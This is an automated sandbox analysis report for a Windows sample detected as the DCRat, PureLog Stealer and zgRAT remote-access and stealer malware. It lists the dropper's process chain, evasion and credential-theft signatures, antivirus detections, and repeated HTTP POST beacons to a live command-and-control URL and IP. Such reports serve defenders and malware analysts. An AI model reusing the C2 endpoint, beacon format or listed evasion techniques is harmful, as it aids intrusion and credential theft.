Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CJF0Ri1HrG.exe

Overview

General Information

Sample name:CJF0Ri1HrG.exe
renamed because original name is a hash value
Original sample name:622AF327A5C66CA6D6D41BF02384B590.exe
Analysis ID:1403873
MD5:622af327a5c66ca6d6d41bf02384b590
SHA1:2e09d3d9017aec9781b77144323eacb06e7838c4
SHA256:1b41fe8ede3b534d1ce19e0d2976fa735e7e2187d17dcbea6c337ed176ad038a
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • CJF0Ri1HrG.exe (PID: 6804 cmdline: C:\Users\user\Desktop\CJF0Ri1HrG.exe MD5: 622AF327A5C66CA6D6D41BF02384B590)
    • wscript.exe (PID: 6964 cmdline: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hyperbrokerhostNetsvc.exe (PID: 6780 cmdline: C:\PortCommon/hyperbrokerhostNetsvc.exe MD5: 23710DF1E01CFC3FA04052BA9F873D98)
          • cmd.exe (PID: 2180 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3652 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 6460 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\PortCommon\hyperbrokerhostNetsvc.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\PortCommon\hyperbrokerhostNetsvc.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 7 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000003.1616007019.0000000006DF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 4 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      5.0.hyperbrokerhostNetsvc.exe.630000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        5.0.hyperbrokerhostNetsvc.exe.630000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\Desktop\CJF0Ri1HrG.exe, ParentImage: C:\Users\user\Desktop\CJF0Ri1HrG.exe, ParentProcessId: 6804, ParentProcessName: CJF0Ri1HrG.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" , ProcessId: 6964, ProcessName: wscript.exe

                          Snort Signatures

                          Timestamp:03/06/24-09:52:31.999098
                          SID:2048095
                          Source Port:49735
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: http://h172956.srv11.test-hf.suAvira URL Cloud: Label: malware
                          Source: http://h172956.srv11.test-hf.su/Avira URL Cloud: Label: malware
                          Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.phpAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\user\Desktop\AFgebewE.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\nxxgerdx.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\kekpPWli.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\Public\TextInputHost.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                          Source: C:\Users\user\Desktop\OnibhGNt.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\avRZftgA.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\XWBrRjTb.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.batAvira: detection malicious, Label: BAT/Runner.IL
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\Users\user\Desktop\PgdUomGa.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\TOksRAfO.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                          Source: C:\Users\user\Desktop\KxrkaJNA.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\GHBtTNNH.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                          Multi AV Scanner detection for domain / URL
                          Source: h172956.srv11.test-hf.suVirustotal: Detection: 13%Perma Link
                          Source: http://h172956.srv11.test-hf.suVirustotal: Detection: 13%Perma Link
                          Source: http://h172956.srv11.test-hf.su/Virustotal: Detection: 13%Perma Link
                          Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.phpVirustotal: Detection: 15%Perma Link
                          Multi AV Scanner detection for dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeReversingLabs: Detection: 91%
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeVirustotal: Detection: 75%Perma Link
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeReversingLabs: Detection: 91%
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeVirustotal: Detection: 75%Perma Link
                          Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeReversingLabs: Detection: 91%
                          Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeVirustotal: Detection: 75%Perma Link
                          Source: C:\Users\Public\TextInputHost.exeReversingLabs: Detection: 91%
                          Source: C:\Users\Public\TextInputHost.exeVirustotal: Detection: 75%Perma Link
                          Source: C:\Users\user\Desktop\AFgebewE.logVirustotal: Detection: 8%Perma Link
                          Source: C:\Users\user\Desktop\EMydcNjR.logVirustotal: Detection: 23%Perma Link
                          Source: C:\Users\user\Desktop\GHBtTNNH.logVirustotal: Detection: 7%Perma Link
                          Source: C:\Users\user\Desktop\OnibhGNt.logVirustotal: Detection: 19%Perma Link
                          Source: C:\Users\user\Desktop\QpUJDpSo.logVirustotal: Detection: 8%Perma Link
                          Source: C:\Users\user\Desktop\RUhcZACY.logVirustotal: Detection: 23%Perma Link
                          Source: C:\Users\user\Desktop\TOksRAfO.logVirustotal: Detection: 7%Perma Link
                          Source: C:\Users\user\Desktop\XWBrRjTb.logReversingLabs: Detection: 62%
                          Source: C:\Users\user\Desktop\XWBrRjTb.logVirustotal: Detection: 69%Perma Link
                          Source: C:\Users\user\Desktop\avRZftgA.logVirustotal: Detection: 19%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: CJF0Ri1HrG.exeReversingLabs: Detection: 57%
                          Source: CJF0Ri1HrG.exeVirustotal: Detection: 49%Perma Link
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\Desktop\AFgebewE.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\nxxgerdx.logJoe Sandbox ML: detected
                          Source: C:\Users\Public\TextInputHost.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJoe Sandbox ML: detected
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\jHHpWudE.logJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: CJF0Ri1HrG.exeJoe Sandbox ML: detected
                          Source: CJF0Ri1HrG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: CJF0Ri1HrG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CJF0Ri1HrG.exe
                          Source: Binary string: 7..pDb source: hyperbrokerhostNetsvc.exe, 00000005.00000002.1940161275.00007FFD9C150000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: <".pDB source: CJF0Ri1HrG.exe
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0036A69B
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0037C220
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh5_2_00007FFD9BC4A75D
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 4x nop then jmp 00007FFD9BAB16D6h13_2_00007FFD9BAB14CE
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh13_2_00007FFD9BC4A75D

                          Networking

                          barindex
                          Snort IDS alert for network traffic
                          Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49735 -> 91.227.16.11:80
                          Source: Joe Sandbox ViewIP Address: 91.227.16.11 91.227.16.11
                          Source: Joe Sandbox ViewASN Name: EXIMIUS-ASRU EXIMIUS-ASRU
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1868Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: multipart/form-data; boundary=----1gHbR9SeE9VTaBijzqbnE2fczWhF4BVimUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 153534Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
